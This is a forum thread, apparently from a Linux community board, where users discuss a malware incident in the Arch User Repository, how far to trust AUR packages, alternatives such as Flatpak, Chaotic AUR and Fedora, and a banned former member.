I don’t think there were ever any traffic numbers communicated by the AUR maintainers, people always looked at total packages. In my experience popularity/traffic falls exponentially, and these were orphaned packages…
But even if we assume an even distribution, it’s worth pointing out it was never 2% at the same time. The first wave was reversed after a few hours, later waves even quicker. So unless someone creates a good timeline most of the time it was fraction or even 0%.
Well, when they lift the AUR registration suspension, I’ld recommend to register an account. You could either vote manually via the AUR site, or automatically via aur-sync-vote for all installed packages. Uninstalling an AUR package would remove would unvote. Nevertheless, I strongly recommend to use the package search to not only check the PKGBUILD, but also the pinned latest comments as those usually provide additional information in case there is an issue. Personally, if I’m looking for something and it’s not available in the official repos, that where I check first.
Good advice, but not sure how that relates to my comment. What am I missing? Oh, and I am already registered there. But I didn’t know about the aur-sync-vote. That’s a good tip. Thanks!
Ah yes, the frog guy. Saying the AUR is the safest method simply because you can see the script you run is… I guess true at a surface level and after one ignores the skill needed and the time one needs to actually make sure it is safe, but Arch advanced distro yes, yes.
You miss him, don’t you? 
I can tell 
Someone made the mistake of asking on the Arch forum if some packages were safe - https://bbs.archlinux.org/viewtopic.php?id=313957…
Some would argue that the Chaotic AUR has proven its worth during this period of chaos in the AUR. They caught some of the affected packages because they scan for malware. Also you can still peruse the PKGBUILD and view the diffs from the previous version at the AUR website whenever an update is available.
But the Chaotic AUR doesn’t include every AUR package, so one may not be able to escape examining & assessing PKGBUILDs in order to stay safe and malware free.
For balance, others would argue that the Chaotic AUR is potentially unsafe and there is no substitute for building a package yourself, or scrutinising the PKGBUILD etc if using an AUR helper such as yay or paru.
I know a lot of people here like him, but I found him from day one a very confrontational individual and generally someone to avoid, but that’s besides the point of this thread.
Honestly, either way I slice it, I feel like the AUR was always a ticking time bomb and we are feeling its first explosion. I imagine if someone really, really wants to be mean, they will find a way to slip through malware and 99% of users will not notice until it is too late.
I still stand by my recommendation of “use what the developer recommends”, but I understand even this method isn’t the full solution to the problem. Maybe it’s a combination of everything, alongside a very healthy dose of praying to whatever divinity you believe in that no malware slipped through.
Another developer isn’t necessarily concerned about what’s best for my system, nor would I expect them to be familiar with Arch or Arch packages. When they’re providing binary packages for Linux, the matter they’re primarily concerned with is distro compatibility, not security, or performance, or manageability.
So unsurprisingly they’ll say if using Debian derivatives, use the .deb package. If using Red Hat derivatives, use the .rpm package. For everyone else, use the FlatPak or AppImage, all for reasons of the obvious compatibility.
But why should I use the FlatPak or AppImage? The Arch packaging system handles .deb and .rpm files just fine. Most -bin AUR packages are likely using them. So their compatibility based recommendation, isn’t actually an issue.
Now if one is not in a position to modify a PKGBUILD for their purposes, or self-validate packages in the AUR, then I think grabbing a developer supplied or sponsored FlatPak or AppImage is a very reasonable alternative.
I want to add too @winnyace, it’s nice to have you back 
Off topic
This frog guy, I wonder what happened, since it looks like he’s banned?
Like that all happened before I was here, but everything I find from him is either being helpful or funny. So it’s kinda weird. Like yes, it seems he was very active and kinda everywhere but still, not bad and usually trying to help?
Well Winny was accurate he had a rather short fuse…and I guess (wasn’t behind the scenes) it went off once too often.
I kinda miss him myself, I resonate with ascerbic humor.
I see, that would explain it. I was just curious, thanks 
I’ve been thinking about this topic a bit after watching a few videos on it. I’ve already posted these thoughts on another Linux forum, but I’d like to share them with you here as well.
I’ve always only installed packages from the AUR that had a lot of votes and that, for example, were linked to by the developers on GitHub or had a lot of positive comments. That way, I could be sure the AUR packages were trustworthy.
I’m not a developer, after all, and I just want to use Linux—not spend my time searching through source code for issues. Arch Linux states in its wiki that it doesn’t recommend the AUR, so it’s my own fault if I don’t review and analyze the changes in the PKGBUILD before installing new AUR packages or updates.
Unfortunately, there are packages, such as 1Password, that are only available in the AUR. There is no dedicated repository for Arch Linux, like the one 1Password offers for Debian/Ubuntu or Fedora. Yes, 1Password is available as a Flatpak. But it isn’t maintained regularly, so it’s outdated, and besides, browsers can’t connect to it when 1Password is running in the Flatpak sandbox. I could download it as an archive from the website and try to get that version to work. But do I want to do that? I don’t want to mess around with it.
My Samsung printer drivers are also only available in the AUR. Luckily, I still have a very old Linux driver from Samsung sitting on my hard drive and was able to install it in Arch Linux. I always install this one from the disk in other distributions as well.
I find Arch Linux particularly interesting because of the packages in the AUR—you can get just about anything there. In some cases, you have no chance of finding packages in other distributions. But they’re available in the AUR. So why don’t the Arch developers “integrate” the AUR better? Why aren’t there any hurdles to overcome when adopting orphaned packages? Why aren’t uploaded packages reviewed?
Like I said, I’m not a developer. When I look at the source code for packages, I’m completely lost. But does that mean I have to be told I’m not a “real” Arch user? Arch Linux is exactly what I was looking for. But I’m just a user…
That’s why I decided yesterday to switch back to Fedora. Maybe Arch Linux really isn’t for me. I don’t know, and I’m at a loss and sad at the same time… 
If you’re not comfortable with how things are done, then I guess the obvious conclusion is it’s not for you. For me (as a retired IT person), I have the time and the ‘shit doesn’t matter’ ability for it to not be the end of the world if I actually contract malware (while keeping a weather eye on things to avoid it).
Though I will say two things: 1) nothing has changed, it’s always been this way 2) In other places (particularly corporate), things happen that you’re definitely never going to hear about (it would be bad for the company).
You’re far from the only one to think that, and ultimately it’s unsurprising that he was suspended.
Despite me deliberately poking your antipathy to 
it is good to have you back 
Fedora is a good choice I was considering it myself too this week. Being a Fedora user doesn’t prevent you from using this forum.
I think the “nothing has changed” point is the key one.
The incident was serious, but it didn’t fundamentally change the trust model of either Arch or the AUR. While the situation has been quite noisy, the actual number of affected users is very small. Personally, I prefer to view it without dramatization, and I think it may even have a positive effect in the medium to long term, by improving security awareness at both a user level and within the community.
agree on this.
I really can’t follow the idea behind switching distro “because AUR is under attack and I have to be careful” thing.
Like just because it happens here, doesn’t mean you will be safe somewhere else.
Like it happened with the DDoS attack. It happened with the AUR, later it happened with Ubuntu…
It’s very likely stuff like this right now will also happen somewhere else. No one is safe.
Also, saying “I’m no dev and I don’t want to read source code/package builds” or “I cant cuz I’m lost” or anything in that regard… Yes I’m also lost reading code(I am willing to learn though). And yes the arch forum would very likely rip me apart mid air for it. But it is known that they aren’t the friendliest to newcomers, so who cares?
Yes you are taking a risk when using the AUR, but if you are aware of it, and have backups and you know at least somewhat what you’re doing, it’s fine in my book.
But changing distro won’t change anything, the risks are still there, especially when you start downloading stuff that isn’t in the main repos.
Firstly, thank you! I’m glad to see you’re still around here! 
Secondly, yeah, you’re right, but I feel like that’s not really the developer’s business and it shouldn’t be. They just made an app and they would like people to use it. They don’t care about what else you’re running and how. They care about their app and how well that one runs and how well is protected.
But you’re touching on something else interesting: what’s exactly the difference between a .deb package and a .rpm package? As far as I can tell… not much, really. It’s just different formats for different package managers that do things ever so slightly differently, but enough to cause the developer pain in the rear. For as many shots as Flatpaks, Snaps and AppImages get, they solve this problem from the developer POV very well and often simplify my life too. I can’t lie when I say that I simply prefer my stuff to work rather than to tinker with my system.
Yeah, these alternative methods also have their issues, but again, if the developer recommends a method, unless I find a better one elsewhere that is somewhat official or trust-worthy enough, I will just use what the developer says, of course unless the package isn’t available in the Arch repos already. I trust the developer enough to use their software, I can trust them to offer me a way to install it on my system without much hassle on our ends too.
I imagined that too, but I also saw many who found it endearing. His knowledge was really obvious, just too bad he had such a large ego alongside it and seemed more interested in following ideologies than balanced output…
Thank you! I am glad you are also still around. 
I know I woke up one day with him and another guy he seemed to be close with being perma banned for similar reasons. Both of them were very… confrontational and seemingly more interested in picking fights and trolling than having measured and balanced discussions.
Speaking of trust level, let us not forget that there was also a incident, reported at the beginning of this month with this npm stuff at Redhat, which ironically is closely related (so to speak) to Fedora. As they say if it can happen there it can happen anywhere.
